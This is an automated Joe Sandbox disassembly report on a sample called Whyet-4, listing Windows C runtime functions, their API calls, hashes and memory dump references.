Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 2183313154-4022980321
Opcode ID: 2fd597ed130682cdad83eb5e5509c53fb8165203a3ef8c33a1dd45f2f99eb7af
Instruction ID: 2850be2412744395cdf26e2155bdeb68c42ae30ddebcecce9f6d69cad248b49d
Opcode Fuzzy Hash: 2fd597ed130682cdad83eb5e5509c53fb8165203a3ef8c33a1dd45f2f99eb7af
Instruction Fuzzy Hash: 8351E327B386CA41FF24DB25A4156BA63A6BF86B84F404139EE5DC3B85DF3EE505C200

Function 00007FF676FA2680 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF676FA33A4,00007FF676FA342E), ref: 00007FF676FA3FF7
RtlLookupFunctionEntry.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF676FA33A4,00007FF676FA342E), ref: 00007FF676FA4016
RtlVirtualUnwind.KERNEL32 ref: 00007FF676FA4062
IsDebuggerPresent.KERNEL32 ref: 00007FF676FA40D4
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF676FA40EC
UnhandledExceptionFilter.KERNEL32 ref: 00007FF676FA40F9
GetCurrentProcess.KERNEL32 ref: 00007FF676FA4112
TerminateProcess.KERNEL32 ref: 00007FF676FA4120

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: def16fc24cee703d4a5537edd1a08e3f5afa767f0e92b5f445a4ac4bfec6e0a8
Instruction ID: 7575b9dedf8aae4a9952f7ca95cd30664ca45e33080a068ba6c6db570744dfca
Opcode Fuzzy Hash: def16fc24cee703d4a5537edd1a08e3f5afa767f0e92b5f445a4ac4bfec6e0a8
Instruction Fuzzy Hash: 0731F53692DBCA85EF109B54F8403AA73A6FB8A744F505036DA8E83764DF7EE054CB00

Function 00007FF676FA3240 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF676FA32AD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF676FA32C5
RtlVirtualUnwind.KERNEL32 ref: 00007FF676FA32FF
IsDebuggerPresent.KERNEL32 ref: 00007FF676FA3335
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF676FA333F
UnhandledExceptionFilter.KERNEL32 ref: 00007FF676FA334A

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 212812d41cc70271c4644ed950498d631a3e0901e36617f5dee6308be7f1040b
Instruction ID: 277990ad5b7071feacb72f2c44e1f87764ed22706480d533c4d89d9a5d9f143c
Opcode Fuzzy Hash: 212812d41cc70271c4644ed950498d631a3e0901e36617f5dee6308be7f1040b
Instruction Fuzzy Hash: 96317F33A28BC686EB60CF25E8406AE73A5FB86754F500135EA9D83B99DF3DD545CB00

Function 00007FF676FA4D20 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF676FA4D57
GetCurrentProcessId.KERNEL32 ref: 00007FF676FA4D62
GetCurrentThreadId.KERNEL32 ref: 00007FF676FA4D6E
GetTickCount.KERNEL32 ref: 00007FF676FA4D7A
QueryPerformanceCounter.KERNEL32 ref: 00007FF676FA4D8B

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 45f2579fbe85fb05cdb622c58f7eecb08a7dcc8e069338e3c73b3b5a557e8f9d
Instruction ID: c0a7d326556ce4d8f9656d20d4811d9a6e93f5b3972b5b0176d8d7580539b29f
Opcode Fuzzy Hash: 45f2579fbe85fb05cdb622c58f7eecb08a7dcc8e069338e3c73b3b5a557e8f9d
Instruction Fuzzy Hash: 6D018822A39E8981EF408F21E84027563B2FB46B90F446630DE6EC7760DE7DD8998700

Function 00007FF676FA42FC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF676FA4307

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bbde7a5f8c646a9abf88cbaeb42008ad304d5913e347a707f2b19ea3527e0825
Instruction ID: ca1da3f58e69c832cb282b6aebb0437d37e0aad2dab9a5aa78be789ca5cb6075
Opcode Fuzzy Hash: bbde7a5f8c646a9abf88cbaeb42008ad304d5913e347a707f2b19ea3527e0825
Instruction Fuzzy Hash: D7B09215E29486C1DA04AB21DC8906012E16B59300FC10430C01DC2120DE9D919B8700

Function 00007FF676FA6424 Relevance: 107.7, APIs: 86, Instructions: 180
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.LIBCMT ref: 00007FF676FA6439

Part of subcall function 00007FF676FA2A80: RtlFreeHeap.NTDLL ref: 00007FF676FA2A96
Part of subcall function 00007FF676FA2A80: _errno.LIBCMT ref: 00007FF676FA2AA0
Part of subcall function 00007FF676FA2A80: GetLastError.KERNEL32 ref: 00007FF676FA2AA8

free.LIBCMT ref: 00007FF676FA6442
free.LIBCMT ref: 00007FF676FA644B
free.LIBCMT ref: 00007FF676FA6454
free.LIBCMT ref: 00007FF676FA645D
free.LIBCMT ref: 00007FF676FA6466
free.LIBCMT ref: 00007FF676FA646E
free.LIBCMT ref: 00007FF676FA6477
free.LIBCMT ref: 00007FF676FA6480
free.LIBCMT ref: 00007FF676FA6489
free.LIBCMT ref: 00007FF676FA6492
free.LIBCMT ref: 00007FF676FA649B
free.LIBCMT ref: 00007FF676FA64A4
free.LIBCMT ref: 00007FF676FA64AD
free.LIBCMT ref: 00007FF676FA64B6
free.LIBCMT ref: 00007FF676FA64BF
free.LIBCMT ref: 00007FF676FA64CB
free.LIBCMT ref: 00007FF676FA64D7
free.LIBCMT ref: 00007FF676FA64E3
free.LIBCMT ref: 00007FF676FA64EF
free.LIBCMT ref: 00007FF676FA64FB
free.LIBCMT ref: 00007FF676FA6507
free.LIBCMT ref: 00007FF676FA6513
free.LIBCMT ref: 00007FF676FA651F
free.LIBCMT ref: 00007FF676FA652B
free.LIBCMT ref: 00007FF676FA6537
free.LIBCMT ref: 00007FF676FA6543
free.LIBCMT ref: 00007FF676FA654F
free.LIBCMT ref: 00007FF676FA655B
free.LIBCMT ref: 00007FF676FA6567
free.LIBCMT ref: 00007FF676FA6573
free.LIBCMT ref: 00007FF676FA657F
free.LIBCMT ref: 00007FF676FA658B
free.LIBCMT ref: 00007FF676FA6597
free.LIBCMT ref: 00007FF676FA65A3
free.LIBCMT ref: 00007FF676FA65AF
free.LIBCMT ref: 00007FF676FA65BB
free.LIBCMT ref: 00007FF676FA65C7
free.LIBCMT ref: 00007FF676FA65D3
free.LIBCMT ref: 00007FF676FA65DF
free.LIBCMT ref: 00007FF676FA65EB
free.LIBCMT ref: 00007FF676FA65F7
free.LIBCMT ref: 00007FF676FA6603
free.LIBCMT ref: 00007FF676FA660F
free.LIBCMT ref: 00007FF676FA661B
free.LIBCMT ref: 00007FF676FA6627
free.LIBCMT ref: 00007FF676FA6633
free.LIBCMT ref: 00007FF676FA663F
free.LIBCMT ref: 00007FF676FA664B
free.LIBCMT ref: 00007FF676FA6657
free.LIBCMT ref: 00007FF676FA6663
free.LIBCMT ref: 00007FF676FA666F
free.LIBCMT ref: 00007FF676FA667B
free.LIBCMT ref: 00007FF676FA6687
free.LIBCMT ref: 00007FF676FA6693
free.LIBCMT ref: 00007FF676FA669F
free.LIBCMT ref: 00007FF676FA66AB
free.LIBCMT ref: 00007FF676FA66B7
free.LIBCMT ref: 00007FF676FA66C3
free.LIBCMT ref: 00007FF676FA66CF
free.LIBCMT ref: 00007FF676FA66DB
free.LIBCMT ref: 00007FF676FA66E7
free.LIBCMT ref: 00007FF676FA66F3
free.LIBCMT ref: 00007FF676FA66FF
free.LIBCMT ref: 00007FF676FA670B
free.LIBCMT ref: 00007FF676FA6717
free.LIBCMT ref: 00007FF676FA6723
free.LIBCMT ref: 00007FF676FA672F
free.LIBCMT ref: 00007FF676FA673B
free.LIBCMT ref: 00007FF676FA6747
free.LIBCMT ref: 00007FF676FA6753
free.LIBCMT ref: 00007FF676FA675F
free.LIBCMT ref: 00007FF676FA676B
free.LIBCMT ref: 00007FF676FA6777
free.LIBCMT ref: 00007FF676FA6783
free.LIBCMT ref: 00007FF676FA678F
free.LIBCMT ref: 00007FF676FA679B
free.LIBCMT ref: 00007FF676FA67A7
free.LIBCMT ref: 00007FF676FA67B3
free.LIBCMT ref: 00007FF676FA67BF
free.LIBCMT ref: 00007FF676FA67CB
free.LIBCMT ref: 00007FF676FA67D7
free.LIBCMT ref: 00007FF676FA67E3
free.LIBCMT ref: 00007FF676FA67EF
free.LIBCMT ref: 00007FF676FA67FB
free.LIBCMT ref: 00007FF676FA6807

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: free$ErrorFreeHeapLast_errno
String ID:
API String ID: 1012874770-0
Opcode ID: edf86528549fd4a00d74b300e45061d263b74162cadb0a9473ea1ce4b70a9a46
Instruction ID: f0bba346ae955482e85b17e7339fe1d7adae0f068636e2a3dc7eaa330af33e8d
Opcode Fuzzy Hash: edf86528549fd4a00d74b300e45061d263b74162cadb0a9473ea1ce4b70a9a46
Instruction Fuzzy Hash: 09A1552372658B85EE55AB31CC952FD2323AF86B44F084131D94EAB967CE1EE84583D0

Function 00007FF676FA517C Relevance: 19.6, APIs: 13, Instructions: 90
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__free_lconv_mon.LIBCMT ref: 00007FF676FA51D4

Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA689E
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA68B0
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA68C2
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA68D4
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA68E6
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA68F8
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA690A
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA691C
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA692E
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA6940
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA6955
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA696A
Part of subcall function 00007FF676FA6880: free.LIBCMT ref: 00007FF676FA697F

free.LIBCMT ref: 00007FF676FA51C8

Part of subcall function 00007FF676FA2A80: RtlFreeHeap.NTDLL ref: 00007FF676FA2A96
Part of subcall function 00007FF676FA2A80: _errno.LIBCMT ref: 00007FF676FA2AA0
Part of subcall function 00007FF676FA2A80: GetLastError.KERNEL32 ref: 00007FF676FA2AA8

free.LIBCMT ref: 00007FF676FA51EA
__free_lconv_num.LIBCMT ref: 00007FF676FA51F6
free.LIBCMT ref: 00007FF676FA5202
free.LIBCMT ref: 00007FF676FA520E
free.LIBCMT ref: 00007FF676FA5232
free.LIBCMT ref: 00007FF676FA5246
free.LIBCMT ref: 00007FF676FA5255
free.LIBCMT ref: 00007FF676FA5261
free.LIBCMT ref: 00007FF676FA528E
free.LIBCMT ref: 00007FF676FA52B6
free.LIBCMT ref: 00007FF676FA52D0

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
String ID:
API String ID: 518839503-0
Opcode ID: 094efc2225f9f2392aa1777af50b5dff1d3982708f759f17dcac6798e4219b3e
Instruction ID: 199f3f5efc214f17fb6ae5802c3972b837a16fc3ce50e756aded3eaa0b96d542
Opcode Fuzzy Hash: 094efc2225f9f2392aa1777af50b5dff1d3982708f759f17dcac6798e4219b3e
Instruction Fuzzy Hash: AE410A33B2A6CA85EF659F61C4503B923A3EF86B54F180031DA0E9B695CF6EE4818350

Function 00007FF676FA698C Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF676FA6A26
malloc.LIBCMT ref: 00007FF676FA6A8F
MultiByteToWideChar.KERNEL32 ref: 00007FF676FA6AC3
LCMapStringW.KERNEL32 ref: 00007FF676FA6AEA
LCMapStringW.KERNEL32 ref: 00007FF676FA6B32
malloc.LIBCMT ref: 00007FF676FA6B8F

Part of subcall function 00007FF676FA2AC0: _FF_MSGBANNER.LIBCMT ref: 00007FF676FA2AF0
Part of subcall function 00007FF676FA2AC0: HeapAlloc.KERNEL32 ref: 00007FF676FA2B15
Part of subcall function 00007FF676FA2AC0: _callnewh.LIBCMT ref: 00007FF676FA2B2E
Part of subcall function 00007FF676FA2AC0: _errno.LIBCMT ref: 00007FF676FA2B39
Part of subcall function 00007FF676FA2AC0: _errno.LIBCMT ref: 00007FF676FA2B44

LCMapStringW.KERNEL32 ref: 00007FF676FA6BC4
WideCharToMultiByte.KERNEL32 ref: 00007FF676FA6C04
free.LIBCMT ref: 00007FF676FA6C18
free.LIBCMT ref: 00007FF676FA6C29

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
String ID:
API String ID: 1080698880-0
Opcode ID: 8fdaffaa25796c73e70ae4d0aaa6c509835928291728d23c1ba84f2db31ab169
Instruction ID: 5922c3d649e74054f8871cf2e9f6ab65f54175ebab70c232ec08d477a4dc9b5a
Opcode Fuzzy Hash: 8fdaffaa25796c73e70ae4d0aaa6c509835928291728d23c1ba84f2db31ab169
Instruction Fuzzy Hash: 36819033B287C686EF248F25944016976A6FF4ABE4F144235EA6DA3BD4DF3EE4418700

Function 00007FF676FA2E54 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FF676FA2E7B

Part of subcall function 00007FF676FA3FA0: _set_error_mode.LIBCMT ref: 00007FF676FA3FA9
Part of subcall function 00007FF676FA3FA0: _set_error_mode.LIBCMT ref: 00007FF676FA3FB8

Part of subcall function 00007FF676FA3D40: _set_error_mode.LIBCMT ref: 00007FF676FA3D85
Part of subcall function 00007FF676FA3D40: _set_error_mode.LIBCMT ref: 00007FF676FA3D96
Part of subcall function 00007FF676FA3D40: GetModuleFileNameW.KERNEL32 ref: 00007FF676FA3DF8

Part of subcall function 00007FF676FA21E8: ExitProcess.KERNEL32 ref: 00007FF676FA21F7

Part of subcall function 00007FF676FA4DD4: malloc.LIBCMT ref: 00007FF676FA4DFF
Part of subcall function 00007FF676FA4DD4: Sleep.KERNEL32 ref: 00007FF676FA4E12

_errno.LIBCMT ref: 00007FF676FA2EBD
_lock.LIBCMT ref: 00007FF676FA2ED1
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF676FA2EE7
free.LIBCMT ref: 00007FF676FA2EF4
_errno.LIBCMT ref: 00007FF676FA2EF9
LeaveCriticalSection.KERNEL32 ref: 00007FF676FA2F1C

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
String ID:
API String ID: 113790786-0
Opcode ID: c45fad584c7e6e6133b4206259e614e6f6fa0dab83848ca5818ee81e43191d37
Instruction ID: 59fd3416ca2c5e9fb440d76798e785efa7664ff2e3c1be71b595ac933e19ce58
Opcode Fuzzy Hash: c45fad584c7e6e6133b4206259e614e6f6fa0dab83848ca5818ee81e43191d37
Instruction Fuzzy Hash: A4213D23F3D6CA81FE64AB60E8447796267EF42740F485038E64ED76C1CF3EA4408700

Function 00007FF676FA4A4C Relevance: 10.7, APIs: 7, Instructions: 184COMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF676FA4A6D

Part of subcall function 00007FF676FA4E54: Sleep.KERNEL32 ref: 00007FF676FA4E99

GetFileType.KERNEL32 ref: 00007FF676FA4BD8
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF676FA4C16

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
String ID:
API String ID: 3473179607-0
Opcode ID: 373c3526b53370dd1b29be18ffebb9d8967604d272333215ec38941ab4ba2182
Instruction ID: 0a8677a5db8961349f2b7e8d694bba2e63d5552dabfcca65bf5b695a6f07f2fb
Opcode Fuzzy Hash: 373c3526b53370dd1b29be18ffebb9d8967604d272333215ec38941ab4ba2182
Instruction Fuzzy Hash: 71818E63A29BCA85EF149F24D58433966A2FB46B64F544339CA7D832D0DF3DE459C300

Function 00007FF676FA237C Relevance: 10.6, APIs: 7, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF676FA23A5

Part of subcall function 00007FF676FA2F3C: _amsg_exit.LIBCMT ref: 00007FF676FA2F66

DecodePointer.KERNEL32(?,?,00000000,00007FF676FA2569), ref: 00007FF676FA23D8
DecodePointer.KERNEL32(?,?,00000000,00007FF676FA2569), ref: 00007FF676FA23F6
DecodePointer.KERNEL32(?,?,00000000,00007FF676FA2569), ref: 00007FF676FA2436
DecodePointer.KERNEL32(?,?,00000000,00007FF676FA2569), ref: 00007FF676FA2450
DecodePointer.KERNEL32(?,?,00000000,00007FF676FA2569), ref: 00007FF676FA2460
ExitProcess.KERNEL32 ref: 00007FF676FA24EC

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: DecodePointer$ExitProcess_amsg_exit_lock
String ID:
API String ID: 3411037476-0
Opcode ID: b53e1919d0650db1d1152386284e4e42a7a0349e1a739623efed4da8177e2040
Instruction ID: bcab40f8a3765a26a06b2e891a1a17915e1817111066869b1bb9465a3dda428a
Opcode Fuzzy Hash: b53e1919d0650db1d1152386284e4e42a7a0349e1a739623efed4da8177e2040
Instruction Fuzzy Hash: EA416F23A3D6CA81FE509B11EC4423962A6FF8AB84F080435ED9DD37A6DF7EE4558700

Function 00007FF676FA5A08 Relevance: 9.1, APIs: 6, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF676FA5A27

Part of subcall function 00007FF676FA35FC: _amsg_exit.LIBCMT ref: 00007FF676FA3612

Part of subcall function 00007FF676FA5644: _getptd.LIBCMT ref: 00007FF676FA564E
Part of subcall function 00007FF676FA5644: _amsg_exit.LIBCMT ref: 00007FF676FA56EB

Part of subcall function 00007FF676FA5700: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FF676FA5A42,?,?,?,?,?,00007FF676FA5BFF), ref: 00007FF676FA572A

Part of subcall function 00007FF676FA4DD4: malloc.LIBCMT ref: 00007FF676FA4DFF
Part of subcall function 00007FF676FA4DD4: Sleep.KERNEL32 ref: 00007FF676FA4E12

free.LIBCMT ref: 00007FF676FA5AB2

Part of subcall function 00007FF676FA2A80: RtlFreeHeap.NTDLL ref: 00007FF676FA2A96
Part of subcall function 00007FF676FA2A80: _errno.LIBCMT ref: 00007FF676FA2AA0
Part of subcall function 00007FF676FA2A80: GetLastError.KERNEL32 ref: 00007FF676FA2AA8

_lock.LIBCMT ref: 00007FF676FA5AE2
free.LIBCMT ref: 00007FF676FA5B85
free.LIBCMT ref: 00007FF676FA5BB1
_errno.LIBCMT ref: 00007FF676FA5BB6

Memory Dump Source

Source File: 00000000.00000002.2192866381.00007FF676FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF676FA0000, based on PE: true

Associated: 00000000.00000002.2192845261.00007FF676FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192887340.00007FF676FA8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192909507.00007FF676FAC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192932803.00007FF676FC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff676fa0000_Whyet-4.jbxd

Similarity

API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
String ID:
API String ID: 3894533514-0
Opcode ID: 824adb76af916895ba058728fd5f93fb0c79903021a6f053eebfd9d524029669
Instruction ID: 9a965be0f02f0ba9cd3af06abaf0bf8843aa6aad20685ddb4e733325bf135693
Opcode Fuzzy Hash: 824adb76af916895ba058728fd5f93fb0c79903021a6f053eebfd9d524029669
Instruction Fuzzy Hash: 7351E223A286CA86EF509B24E44027977A3FF46B94F184236DA5EC7396CF3EE401C700

Function 00007FF676FA4958 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF676FA2C6C), ref: 00007FF676FA4971
